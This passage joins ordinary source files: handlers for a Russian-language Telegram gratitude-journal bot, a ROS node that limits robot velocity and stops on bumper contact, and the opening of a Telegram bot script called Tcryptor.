    elif message.text == 'Почитать':
        texts = bfunc.data_command("SELECT text FROM texts WHERE `trigger` = 1")
        if not texts:
            bot.send_message(message.chat.id, 'Пока здесь пусто — попробуй позже.', reply_markup=bdat.insp_get_buttons)
            bot.register_next_step_handler(message, insp_get)
            return
        text_number = len(texts) - 1
        bot.send_message(message.chat.id, texts[random.randint(0, len(texts) - 1)][0], reply_markup=bdat.after_text_insp)
        bot.register_next_step_handler(message, after_text_insp, text_number)
    elif message.text == 'Назад':
        bot.send_message(message.chat.id, 'Ты хочешь получить вдохновение или поделиться им?', reply_markup=bdat.insp_1_buttons)
        bot.register_next_step_handler(message, select_insp)
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, insp_get)
def after_voice_insp(message, voice_number):
    """Page through approved voice inspirations from the newest backwards.

    voice_number is the index of the NEXT voice to play; it wraps to the end of
    the list when it underflows to -1.

    Fix: the fallback branch re-registered this handler WITHOUT voice_number,
    which raised TypeError on the user's next message.
    """
    if message.text == 'Ещё':
        voices = bfunc.data_command("SELECT file_id FROM voices WHERE `trigger` = 1")
        if voice_number == -1:
            voice_number = len(voices)-1
        bot.send_voice(message.chat.id, voices[voice_number][0], reply_markup=bdat.after_voice_insp)
        voice_number -= 1
        bot.register_next_step_handler(message, after_voice_insp, voice_number)
    elif message.text == 'Назад':
        bot.send_message(message.chat.id, 'Что тебе сейчас больше хочется — послушать или почитать благодарности?', reply_markup=bdat.insp_get_buttons)
        bot.register_next_step_handler(message, insp_get)
    elif message.text == 'В главное меню':
        bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, after_voice_insp, voice_number)
def after_text_insp(message, text_number):
    """Page through approved text inspirations from the newest backwards.

    text_number is the index of the NEXT text to show; it wraps to the end of
    the list when it underflows to -1.

    Fix: the fallback branch registered the WRONG handler (after_voice_insp)
    and omitted the required index argument, raising TypeError on the next
    message.
    """
    if message.text == 'Ещё':
        texts = bfunc.data_command("SELECT text FROM texts WHERE `trigger` = 1")
        if text_number == -1:
            text_number = len(texts)-1
        bot.send_message(message.chat.id, texts[text_number][0], reply_markup=bdat.after_text_insp)
        text_number -= 1
        bot.register_next_step_handler(message, after_text_insp, text_number)
    elif message.text == 'Назад':
        bot.send_message(message.chat.id, 'Что тебе сейчас больше хочется — послушать или почитать благодарности?', reply_markup=bdat.insp_get_buttons)
        bot.register_next_step_handler(message, insp_get)
    elif message.text == 'В главное меню':
        bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, after_text_insp, text_number)
def insp_share(message):
    """Sharing flow: pick voice or text; voice notes are handled by a media handler elsewhere."""
    chat_id = message.chat.id
    if message.text == 'Голосом':
        # No next-step handler here: the incoming voice message is picked up by
        # the bot's voice content handler.
        bot.send_message(chat_id, 'Отправь следующим сообщением голосовое сообщение с опытом развития практики или с твоей уникальной благодарностью и важными словами, которое услышат другие пользователи бота, когда захотят получить вдохновение. Благодарность можешь подкрепить мини-историей, которая создаст облако контекста вокруг неё.\n\nВсе анонимно, поэтому можешь говорить максимально искренне :)', reply_markup=bdat.main_menu_buttons)
        return
    if message.text == 'Текстом':
        bot.send_message(chat_id, 'Напиши тут опыт развития практики, твою уникальную благодарность и вдохновляющее сообщение, которое я буду показывать другим пользователям бота, когда они захотят получить вдохновение.\n\nВсе анонимно, поэтому можешь писать максимально искренне и открыто =)', reply_markup=bdat.back)
        bot.register_next_step_handler(message, insp_share_text)
        return
    if message.text == 'Назад':
        bot.send_message(chat_id, 'Ты хочешь получить вдохновение или поделиться им?',
                         reply_markup=bdat.insp_1_buttons)
        bot.register_next_step_handler(message, select_insp)
        return
    bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
    bot.register_next_step_handler(message, insp_share)
def insp_share_text(message):
    """Accept a text inspiration and forward it to the moderator with accept/reject buttons."""
    text = message.text
    if text == 'Назад':
        bot.send_message(message.chat.id, 'Как тебе хочется поделиться — текстом или голосом?',
                         reply_markup=bdat.insp_share_buttons)
        bot.register_next_step_handler(message, insp_share)
        return
    bot.send_message(message.chat.id,
                     'Спасибо, мы приняли ваше сообщение, оно будет рассмотрено модератором.', reply_markup=bdat.main_menu_buttons)
    # Moderator's inline keyboard: accept writes the text to the DB, reject drops it.
    moderation_kb = InlineKeyboardMarkup()
    moderation_kb.row_width = 2
    moderation_kb.add(InlineKeyboardButton("Принять текст", callback_data="cb_insp_text_yes", one_time_keyboard=True),
                      InlineKeyboardButton("Отклонить текст (удалить)", callback_data="cb_insp_text_no", one_time_keyboard=True))
    bot.send_message(bdat.authors_id[0], text, reply_markup=moderation_kb)
def support(message):
    """Support flow: send a gendered support text plus a few of the user's own past notes."""
    chat_id = message.chat.id
    support_text = bfunc.gender_text(chat_id, bdat.support_male, bdat.support_female)
    bot.send_message(chat_id, support_text + bfunc.rand_grate(chat_id, 5, 30), reply_markup=bdat.support_2)
    bot.register_next_step_handler(message, support_2)
def support_2(message):
    """Support flow: offer help contacts or acknowledge the user feels better.

    Fix: unrecognized input previously dead-ended the conversation; a fallback
    re-prompt consistent with the sibling handlers was added.
    """
    if message.text == 'Мне нужна помощь':
        bot.send_message(message.chat.id, bdat.help_contacts, reply_markup=bdat.thanks_button)
        bot.register_next_step_handler(message, thanks_)
    elif message.text == 'Спасибо, мне лучше':
        bot.send_message(message.chat.id,
                         'Пожалуйста! Ты правда большой молодец, что столько делаешь для себя.\n\nЧтобы признать, что тебе плохо, нужна большая смелость. Не забудь записать благодарность об этом :)',
                         reply_markup=bdat.main_menu_buttons)
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, support_2)
def thanks_(message):
    """Support flow exit: any reply returns the user to the main menu."""
    bot.send_message(message.chat.id, "Ты в главном меню", reply_markup=bdat.main_menu_buttons)
def about_1(message):
    """About-the-practice, step 1: continue on 'Далее', otherwise back to the menu."""
    chat_id = message.chat.id
    if message.text != 'Далее':
        bot.send_message(chat_id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
        return
    about_text = ('Практика благодарности — работающий способ улучшить свое состояние и качество жизни.\n\nОна заключается в том, чтобы каждый день обращать на хорошие вещи, которые с тобой происходят, и ощущать за них благодарность.\n\nТак ты будешь развивать привычку замечать хорошее, больше ценить себя и свои действия. А значит и чувствовать себя лучше, ведь твоя субъективная реальность зависит от того, на что ты '
                  + bfunc.gender_text(chat_id, 'привык', 'привыкла') + ' направлять внимание.')
    bot.send_message(chat_id, about_text, reply_markup=bdat.about2_text)
    bot.register_next_step_handler(message, about_2)
def about_2(message):
    """About-the-practice, step 2: research-backed benefits."""
    about_text = 'Практику благодарности рекомендуют не только психологи, но и ученые.\n\nСогласно исследованиям, практика благодарности повышает самооценку, позитивно влияет на физическое и ментальное здоровье, понижает агрессию, делает людей более эмпатичными, открытыми и устойчивыми.'
    bot.send_message(message.chat.id, about_text, reply_markup=bdat.about3_text)
    bot.register_next_step_handler(message, about_3)
def about_3(message):
    """About-the-practice, step 3: the gratitude journal and the author's story."""
    about_text = 'Самый популярный способ — это дневник. Кстати, дневник благодарностей активно используют в научно доказанной когнитивно-поведенческой терапии.\n\nЯ сам несколько раз начинал вести его, потому что чувствовал себя плохо, а практика благодарности помогала мне приходить в хорошее состояние. Но я столкнулся с тем, что забываю делать новые записи в дневнике и пересматривать старые — а это очень важно делать регулярно.'
    bot.send_message(message.chat.id, about_text, reply_markup=bdat.about4_text)
    bot.register_next_step_handler(message, about_4)
def about_4(message):
    """About-the-practice, step 4: why this bot exists."""
    about_text = 'Я поговорил с людьми вокруг меня, которые делали практику благодарности. Многие сталкивались с этими проблемами и даже перестали делать практику, хотя раньше она им помогала.\n\nТогда я придумал этого бота, чтобы максимально упростить для людей процесс регулярной записи новых благодарностей и пересмотра старых.'
    bot.send_message(message.chat.id, about_text, reply_markup=bdat.cont)
    bot.register_next_step_handler(message, about_5)
def about_5(message):
    """About-the-practice, step 5: forward the canned text and move to the last step."""
    bot.send_message(message.chat.id, stick.about_6_text, reply_markup=bdat.about5_text)
    bot.register_next_step_handler(message, about_6)
def about_6(message):
    """About-the-practice, final step: closing text, back to the main menu keyboard."""
    bot.send_message(message.chat.id, stick.about_7_text,
                     reply_markup=bdat.main_menu_buttons,
                     parse_mode="Markdown",
                     disable_web_page_preview=True)
def bot_team(message):
    """Exit from the bot-team screen: any reply returns the user to the main menu.

    Fix: the original if/else branches were byte-identical, so the condition was
    redundant and has been removed — behavior is unchanged.
    """
    bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
def view_grates(message, x):
    """Browse past gratitude notes week by week, or export them all via Telegraph.

    x is the paging offset in weeks (1-based); "Неделю назад" shows the next
    older week and increments it.

    Fix: unrecognized input previously dead-ended the conversation; a fallback
    re-prompt consistent with the sibling handlers was added.
    """
    if message.text == "В главное меню":
        bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
    elif message.text == "Показать все":
        all_grates = bfunc.last_grates(1, "all", message.chat.id)
        bot.send_message(message.chat.id,
                         "[Вот все твои благодарности](" + bfunc.to_telegraph_link(all_grates, message.chat.id) + ")",
                         reply_markup=bdat.last_grates_buttons, parse_mode="Markdown")
        bot.register_next_step_handler(message, view_grates, x)
    elif message.text == "Неделю назад":
        bot.send_message(message.chat.id, bfunc.last_grates(7 + x * 7, 7 * x, message.chat.id),
                         reply_markup=bdat.last_grates_buttons)
        bot.register_next_step_handler(message, view_grates, x + 1)
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, view_grates, x)
def new_grate(message):
    """Store a new gratitude note unless the text is a navigation command.

    Fixes:
    - single quotes in the note are doubled before splicing into the INSERT —
      previously an apostrophe broke the SQL (and allowed injection);
    - added `return` after the error path: previously the success message was
      still sent and TWO next-step handlers were registered after a failure.
    NOTE(review): a parameterized query in bfunc.ex_command would be the real fix.
    """
    if message.text == '/start' or message.text == "В главное меню" or message.text == "Назад" or message.text == "Хочу записать ещё благодарность" or message.text == "/set_notification" or message.text == "Новая благодарность" or message.text == "Мои благодарности":
        bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
        return
    text = message.text
    try:
        bfunc.ex_command(
            "INSERT INTO notes (date, note, chat_id) VALUES (CURRENT_TIMESTAMP,'" + text.replace("'", "''") + "', '" + str(
                message.chat.id) + "');")
    except Exception as ex:
        bot.send_message(message.chat.id, "Непредвиденная ошибка, попробуйте добавить благодарность снова.")
        bot.register_next_step_handler(message, new_grate)
        print(type(ex))
        return
    bot.send_message(message.chat.id, bfunc.gender_text(message.chat.id, random.choice(stick.dofamin_male),
                                                        random.choice(stick.dofamin_female)),
                     reply_markup=bdat.again_or_not)
    check_achievement(message.chat.id)
    bot.register_next_step_handler(message, again_or_not_func)
def again_or_not_func(message):
    """After saving a note: write another one, stop, or treat free text as a new note."""
    answer = message.text
    if answer == 'Хочу записать еще благодарность':
        bot.send_message(message.chat.id,
                         bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
                         reply_markup=bdat.back)
        bot.register_next_step_handler(message, new_grate)
    elif answer == 'Пока хватит':
        bot.send_message(message.chat.id,
                         'Спасибо тебе, что делаешь важные для себя шаги. Ты просто супер!\n\nВозвращайся с новыми благодарностями :)',
                         reply_markup=bdat.main_menu_buttons)
    else:
        # Any other text is assumed to be another gratitude note.
        new_grate(message)
def settings(message):
    """Settings sub-menu dispatcher: name, achievements, wording, reminders, notes."""
    chat_id = message.chat.id
    if message.text == 'Имя':
        bot.send_message(chat_id, 'Давай поменяем имя! Как тебя зовут?')
        bot.register_next_step_handler(message, set_new_name)
        return
    if message.text == 'Достижения':
        bot.send_message(chat_id, 'Как ты хочешь получать сообщения о достижениях - голосовым или текстовым сообщением?', reply_markup=bdat.achieve_methods)
        bot.register_next_step_handler(message, set_achieve_method)
        return
    if message.text == 'Обращение':
        bot.send_message(chat_id,
                         'Как ты хочешь, чтобы мы говорили о твоих благодарностях?\n«Я благодарен за то, что...»\n«Я благодарна за то, что...» ',
                         reply_markup=bdat.gender)
        bot.register_next_step_handler(message, set_new_gender)
        return
    if message.text == 'Напоминалки':
        bot.send_message(chat_id, 'Во сколько тебе напомнить о практике благодарности? (по часовому поясу MSK)',
                         reply_markup=bdat.many_moments)
        bot.register_next_step_handler(message, set_new_time)
        return
    if message.text == 'Благодарности':
        bot.send_message(chat_id, 'Настройки благодарностей',
                         reply_markup=bdat.grate_settings_buttons)
        bot.register_next_step_handler(message, grate_settings)
        return
    if message.text == 'В главное меню':
        bot.send_message(chat_id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
        return
    bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
    bot.register_next_step_handler(message, settings)
def grate_settings(message):
    """Notes settings: offer the delete-all confirmation or go back."""
    chat_id = message.chat.id
    if message.text == 'Удалить все благодарности':
        bot.send_message(chat_id,
                         'Вы точно хотите удалить все свои благодарности? Их будет невозможно восстановить.',
                         reply_markup=bdat.grate_settings_buttons_confirm)
        bot.register_next_step_handler(message, grate_settings_confirm)
        return
    if message.text == 'Назад':
        bot.send_message(chat_id, 'Что будем настраивать?', reply_markup=bdat.settings_buttons)
        bot.register_next_step_handler(message, settings)
        return
    bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
    bot.register_next_step_handler(message, grate_settings)
def grate_settings_confirm(message):
    """Destructive-action confirmation: wipe all of the user's notes on 'Подтвердить'."""
    chat_id = message.chat.id
    if message.text == 'Подтвердить':
        bfunc.delete_all(chat_id)
        bot.send_message(chat_id, 'Все твои благодарности удалены. Что будем настраивать?',
                         reply_markup=bdat.settings_buttons)
        bot.register_next_step_handler(message, settings)
        return
    if message.text == 'Назад':
        bot.send_message(chat_id, 'Настройки благодарностей', reply_markup=bdat.grate_settings_buttons)
        bot.register_next_step_handler(message, grate_settings)
        return
    if message.text == 'В главное меню':
        bot.send_message(chat_id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
        return
    bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
    bot.register_next_step_handler(message, grate_settings_confirm)
def set_new_time(message):
    """Settings: change (or disable) the daily reminder time."""
    chat_id = message.chat.id
    chosen = message.text
    # Only whitelisted moments reach the concatenated SQL below.
    if chosen in bdat.list_moments:
        bfunc.ex_command(
            "update bot_users set scheduler = '" + chosen + "' where chat_id = '" + str(chat_id) + "';")
        bot.send_message(chat_id,
                         'Супер! Буду напоминать тебе каждый день в ' + chosen + ' :)\nКстати, не хочешь записать благодарность?',
                         reply_markup=bdat.after_setting)
        bot.register_next_step_handler(message, after_setting_choice)
        return
    if chosen == 'Отключить напоминания':
        bot.send_message(chat_id, bdat.notif_off_text_from_settings, reply_markup=bdat.after_setting)
        bfunc.ex_command(
            "update bot_users set scheduler = '" + 'off' + "' where chat_id = '" + str(chat_id) + "';")
        bot.register_next_step_handler(message, after_setting_choice)
        return
    if chosen == "Назад":
        bot.send_message(chat_id, 'Что будем настраивать?', reply_markup=bdat.settings_buttons)
        bot.register_next_step_handler(message, settings)
        return
    bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
    bot.register_next_step_handler(message, set_new_time)
def set_new_time_from_notif(message):
    """Change/disable the reminder time when reached from a notification message.

    Fix: the "В главное меню" branch registered `settings` as the next-step
    handler while showing the MAIN MENU keyboard, so the next button press was
    misrouted into the settings dispatcher. Every other main-menu exit in this
    file just sends the menu without registering a handler; now this one does too.
    """
    if message.text in bdat.list_moments:
        # Only whitelisted moments reach the concatenated SQL below.
        bfunc.ex_command(
            "update bot_users set scheduler = '" + message.text + "' where chat_id = '" + str(message.chat.id) + "';")
        bot.send_message(message.chat.id,
                         'Хорошо! Буду напоминать тебе каждый день в ' + message.text + ' :)\n\nТы в главном меню',
                         reply_markup=bdat.main_menu_buttons)
    elif message.text == 'Отключить напоминания':
        bot.send_message(message.chat.id, bdat.notif_off_text, reply_markup=bdat.main_menu_buttons)
        bfunc.ex_command(
            "update bot_users set scheduler = '" + 'off' + "' where chat_id = '" + str(message.chat.id) + "';")
    elif message.text == "В главное меню":
        bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, set_new_time_from_notif)
def set_new_name(message):
    """Settings: update the stored display name.

    Fix: single quotes in the name are doubled before splicing into the UPDATE —
    previously an apostrophe broke the SQL (and allowed injection).
    NOTE(review): a parameterized query in bfunc.ex_command would be the real fix.
    """
    name = message.text
    safe_name = name.replace("'", "''")  # SQL single-quote escaping
    bfunc.ex_command("update bot_users set nickname = '" + safe_name + "' where chat_id = '" + str(message.chat.id) + "';")
    bot.send_message(message.chat.id,
                     "Отлично, " + name + ". Я все запомнил :)\nКстати, не хочешь записать благодарность?",
                     reply_markup=bdat.after_setting)
    bot.register_next_step_handler(message, after_setting_choice)
def set_achieve_method(message):
    """Persist the user's preferred achievement-delivery format.

    Recognised replies map to the ``achieve_method`` column values
    'voice', 'text' or 'video_note'.  Unrecognised input re-prompts and
    must not fall through to the confirmation below.
    """
    methods = {
        'Голосовое сообщение': 'voice',
        'Текстовое сообщение': 'text',
        'Круглое видеосообщение': 'video_note',
    }
    method = methods.get(message.text)
    if method is None:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, set_achieve_method)
        # Bug fix: the original fell through here, also sending the
        # confirmation and registering a second, competing step handler.
        return
    bfunc.ex_command("update bot_users set achieve_method = '" + method + "' where chat_id = '" + str(message.chat.id) + "';")
    bot.send_message(message.chat.id,
                     "Хорошо.\nКстати, не хочешь записать благодарность?",
                     reply_markup=bdat.after_setting)
    bot.register_next_step_handler(message, after_setting_choice)
def set_new_gender(message):
    """Record the grammatical gender used for gratitude prompts."""
    replies = {
        'Я благодарен': ('male',
                         "Договорились! Теперь буду предлагать тебе продолжить фразу «Я благодарен за то, что»\n\nКстати, не хочешь записать благодарность?"),
        'Я благодарна': ('female',
                         "Договорились! Теперь буду предлагать тебе продолжить фразу «Я благодарна за то, что»\n\nКстати, не хочешь записать благодарность?"),
    }
    if message.text in replies:
        gender, reply = replies[message.text]
        bfunc.ex_command("update bot_users set gender = '{0}' where chat_id = '{1}';".format(gender, message.chat.id))
        bot.send_message(message.chat.id, reply, reply_markup=bdat.after_setting)
        bot.register_next_step_handler(message, after_setting_choice)
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, set_new_gender)
def after_setting_choice(message):
    """Route the follow-up choice shown after any settings change."""
    chat_id = message.chat.id
    if message.text == 'Другие настройки':
        bot.send_message(chat_id, 'Что будем настраивать?', reply_markup=bdat.settings_buttons)
        bot.register_next_step_handler(message, settings)
    elif message.text == 'В главное меню':
        # Main menu registers no next-step handler; command handlers take over.
        bot.send_message(chat_id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
    elif message.text == 'Записать благодарность':
        prompt = bfunc.gender_text(chat_id, bdat.text_write_grate_male, bdat.text_write_grate_female)
        bot.send_message(chat_id, prompt, reply_markup=bdat.empty)
        bot.register_next_step_handler(message, new_grate)
    else:
        bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, after_setting_choice)
def after_notif(message):
    """Route the user's reply to a daily reminder message."""
    chat_id = message.chat.id
    text = message.text
    if text == 'Новая благодарность':
        prompt = bfunc.gender_text(chat_id, bdat.text_write_grate_male, bdat.text_write_grate_female)
        bot.send_message(chat_id, prompt, reply_markup=bdat.back)
        bot.register_next_step_handler(message, new_grate)
    elif text == 'Отключить напоминания':
        bot.send_message(chat_id, bdat.notif_off_text, reply_markup=bdat.main_menu_buttons)
        bfunc.ex_command(
            "update bot_users set scheduler = 'off' where chat_id = '{0}';".format(chat_id))
    elif text == 'Выбрать другое время напоминания':
        bot.send_message(chat_id, 'Во сколько тебе напомнить о практике благодарности? (по часовому поясу MSK)',
                         reply_markup=bdat.many_moments)
        bot.register_next_step_handler(message, set_new_time_from_notif)
    elif text == 'Главное меню':
        bot.send_message(chat_id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
    elif text == 'Команда бота':
        bot.send_message(chat_id, bdat.bot_team_text, reply_markup=bdat.to_main_munu_button,
                         parse_mode="Markdown", disable_web_page_preview=True)
        bot.register_next_step_handler(message, bot_team)
    else:
        bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, after_notif)
def function_to_run():
    """Hourly scheduler job: send a reminder to every user whose saved
    reminder time matches the current hour (MSK, '<hour>:00')."""
    try:
        # times is presumably a list of (chat_id, scheduler_time) pairs
        # from the bot_users table -- TODO confirm against bfunc.double_list.
        times = bfunc.double_list()
        current_datetime = datetime.now()
        current_hour = current_datetime.hour
        print(current_datetime, current_hour, sep='\n\n')
        for i in range(len(times)):
            if times[i][1] == str(current_hour) + ":00":
                try:
                    # NOTE(review): times[i][0][:500] slices the chat id; this
                    # only makes sense if chat ids are stored as strings --
                    # confirm the intent of the [:500] cap.
                    msg = bot.send_message(times[i][0], stick.notifi + bfunc.last_grates(5, "last", times[i][0][:500]) + "\nВсего благодарностей: " + bfunc.count_all(times[i][0])+ '\n\nОтключить напоминания или изменить время: /set_notification', reply_markup=bdat.main_menu_buttons)
                    # Drop any pending next-step handler so the reminder's
                    # buttons are handled by the command handlers instead.
                    bot.clear_step_handler_by_chat_id(times[i][0])
                    #bot.register_next_step_handler(msg, after_notif)
                except Exception as ex:
                    # A blocked bot means the user is gone: purge them.
                    if 'bot was blocked by the user' in str(ex):
                        bfunc.delete_user(times[i][0])
                        update_number_of_users()
                    else:
                        print('Возникла осечка в отправке напоминалки человеку ' + str(times[i][0]) + '.\nПричина: ')
                        print(ex, type(ex), "Содержимое переменной str(ex): ", str(ex), sep='\n')
    except Exception as ex:
        # Keep the scheduler thread alive: log and swallow everything.
        print('Возникла осечка в работе напоминалки.\nПричина: ')
        print(ex, type(ex), sep='\n')
def schedule_checker():
    """Background loop: run due `schedule` jobs, polling every 30 seconds."""
    while True:
        schedule.run_pending()
        sleep(30)
def choose_achivement_method(chat_id):
    """Ask the user, via an inline keyboard, how achievement messages
    should be delivered (video note / voice / text)."""
    markup = InlineKeyboardMarkup()
    markup.row_width = 2
    # NOTE(review): one_time_keyboard is not a standard InlineKeyboardButton
    # argument -- confirm the installed telebot version accepts/ignores it.
    markup.add(InlineKeyboardButton("Видео-кружочком", callback_data="cb_video_note", one_time_keyboard=True), InlineKeyboardButton("Голосом", callback_data="cb_voice", one_time_keyboard=True),
    InlineKeyboardButton("Текстом", callback_data="cb_text", one_time_keyboard=True))
    bot.send_message(chat_id, 'Я буду сообщать тебе о твоих достижениях, как ты хочешь получать сообщения - круглыми видеосообщениями, голосовыми или текстовыми сообщениями? В первый раз я отправил видео-кружочком. В настройках можно будет изменить способ получения достижений.', reply_markup=markup)
def check_achievement(chat_id):
    """Send a milestone message when the user's gratitude count matches a
    trigger row; delivery format follows the user's achieve_method."""
    number = str(bfunc.count_all(chat_id))
    # All counts that have an associated video note act as triggers.
    triggers = set([str(x[0]) for x in bfunc.data_command("SELECT `trigger` FROM video_notes")])
    if number == "5":
        # The fifth gratitude additionally asks the user to pick a format.
        choose_achivement_method(chat_id)
        bot.send_voice(chat_id, bfunc.data_command("SELECT file_id FROM voices WHERE `trigger` = " + str(number))[0][0])
    elif number in triggers and int(number) > 2:
        # NOTE(review): values are interpolated into SQL unescaped; chat_id
        # and number are internally produced, but parameterised queries
        # would still be safer.
        method = bfunc.data_command("SELECT achieve_method FROM bot_users WHERE chat_id = " + str(chat_id))[0][0]
        if method == 'video_note':
            bot.send_video_note(chat_id,
                                bfunc.data_command("SELECT file_id FROM video_notes WHERE `trigger` = " + str(number))[0][0])
        elif method == 'voice':
            bot.send_voice(chat_id,
                           bfunc.data_command("SELECT file_id FROM voices WHERE `trigger` = " + str(number))[0][0])
        elif method == 'text':
            bot.send_message(chat_id, bfunc.data_command("SELECT text FROM texts WHERE `trigger` = " + str(number))[0][0])
if __name__ == '__main__':
    try:
        # Bug fix: handler persistence must be enabled and restored BEFORE
        # infinity_polling() -- that call blocks forever, so in the original
        # these two lines were never reached.
        bot.enable_save_next_step_handlers(delay=2)
        bot.load_next_step_handlers()
        # Fire the reminder job a minute past every hour, in its own thread.
        schedule.every().hour.at(':01').do(function_to_run)
        Thread(target=schedule_checker).start()
        bot.infinity_polling()
    except Exception as ex:
        print('Возникла осечка в работе программы.\nПричина: ')
        print(ex, type(ex), sep='\n')
republish_cmd_vel.py | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist
from math import pi
from kobuki_msgs.msg import BumperEvent, Led
from threading import Thread
from std_srvs.srv import Empty, EmptyResponse
class CmdVelRepublisher():
    """Republish /cmd_vel onto the kobuki base with speed limiting and a
    bumper-triggered safety stop.

    While a bumper stop is latched, one background thread streams zero
    velocities and another blinks the base LEDs until the
    /reset_bumper_stop service re-enables motion.
    """

    def __init__(self):
        rospy.init_node('cmd_vel_republisher')
        self.disabled = False
        self.stop_thread = None
        self.led_thread = None
        # Velocity limits (linear m/s, angular rad/s); private params override.
        self.x_lim = rospy.get_param("~x_lim", 0.55)
        self.z_lim = rospy.get_param("~z_lim", pi)
        self.pub = rospy.Publisher('/mobile_base/commands/velocity', Twist, queue_size=10)
        self.pub_led1 = rospy.Publisher('/mobile_base/commands/led1', Led, queue_size=10)
        self.pub_led2 = rospy.Publisher('/mobile_base/commands/led2', Led, queue_size=10)
        rospy.Service("/reset_bumper_stop", Empty, self.enable)
        rospy.Subscriber('/mobile_base/events/bumper', BumperEvent, self.bumper_cb)
        rospy.Subscriber("/cmd_vel", Twist, self.callback)
        rospy.logdebug(rospy.get_name() + " setting up")

    @staticmethod
    def _clamp(value, limit):
        """Clamp *value* to the symmetric range [-limit, limit].

        Bug fix: the original only capped the upper bound, so large
        negative (reverse / clockwise) commands passed through unlimited.
        """
        return max(-limit, min(limit, value))

    def callback(self, msg):
        """Republish a Twist with both components magnitude-limited."""
        if not self.is_disabled():
            out = Twist()
            rospy.logdebug(rospy.get_name() + ": I heard %s" % msg)
            out.linear.x = self._clamp(msg.linear.x, self.x_lim)
            out.angular.z = self._clamp(msg.angular.z, self.z_lim)
            self.pub.publish(out)
        else:
            rospy.logwarn("cmd vel republisher disabled")

    def stop(self):
        """Stream zero velocities at 10 Hz while the stop is latched."""
        while self.is_disabled() and not rospy.is_shutdown():
            out = Twist()
            out.linear.x = 0.
            out.angular.z = 0.
            self.pub.publish(out)
            rospy.sleep(0.1)

    def leds(self):
        """Alternate the base LEDs while disabled, then switch them off."""
        while self.is_disabled() and not rospy.is_shutdown():
            self.pub_led1.publish(Led(value=2))
            self.pub_led2.publish(Led(value=3))
            rospy.sleep(0.5)
            self.pub_led1.publish(Led(value=3))
            self.pub_led2.publish(Led(value=2))
            rospy.sleep(0.5)
        self.pub_led1.publish(Led(value=0))
        self.pub_led2.publish(Led(value=0))

    def bumper_cb(self, msg):
        """Latch the disabled state on bumper press and start the
        stop/LED background threads."""
        if not self.is_disabled() and msg.state:
            self.disabled = msg.state
            self.stop_thread = Thread(target=self.stop)
            self.stop_thread.start()
            self.led_thread = Thread(target=self.leds)
            self.led_thread.start()

    def enable(self, req):
        """Service handler for /reset_bumper_stop: clear the latch and
        wait for the background threads to finish."""
        self.disabled = False
        if self.stop_thread:
            self.stop_thread.join()
        if self.led_thread:
            self.led_thread.join()
        return EmptyResponse()

    def is_disabled(self):
        """True while a bumper stop is latched."""
        return self.disabled
if __name__ == '__main__':
    # Instantiate the node and hand control to the ROS event loop.
    node = CmdVelRepublisher()
    rospy.spin()
|
Tcryptor.py | print(f' _ _ ---==== Tcryptor ====--- _ _\n')
from TcCore import *
from TcProcessor import TcProcessor
from TcEncryptor import TcEncryptor
from telegram import ParseMode
from telegram.utils.helpers import mention_html
import sys, traceback
from threading import Thread
import urllib.request # Check for internet connectivity
os.system(f'title _ _ ---==== Tcryptor {ver} ====--- _ _')
# Block startup until the Telegram API is reachable.
while True:
    try:
        ACR_PING_CODE = urllib.request.urlopen("https://api.telegram.org").getcode()
        if ACR_PING_CODE == 200:
            logger.info('Telegram pinged successfully!')
            break
        else:
            logger.warning('Telegram ping error code: '+str(ACR_PING_CODE)+', retrying in 20 seconds')
            time.sleep(20)
    except Exception:
        # Bug fix: narrowed from a bare ``except`` that also swallowed
        # KeyboardInterrupt/SystemExit, making Ctrl-C useless here.
        logger.warning('Unable to ping Telegram, retrying in 10 seconds')
        time.sleep(10)
# this is a general error handler function. If you need more information about specific type of update, add it to the
# payload in the respective if clause
def error(update, context):
    """Global python-telegram-bot error handler.

    Known failure modes get a friendly user-facing reply; everything else
    sends an apology to the user and a full HTML traceback report to the
    developer, then re-raises so the logging module records it.
    """
    # we want to notify the user of this problem. This will always work, but not notify users if the update is an
    # callback or inline query, or a poll update. In case you want this, keep in mind that sending the message
    # could fail
    if str(context.error) == 'Message is too long':
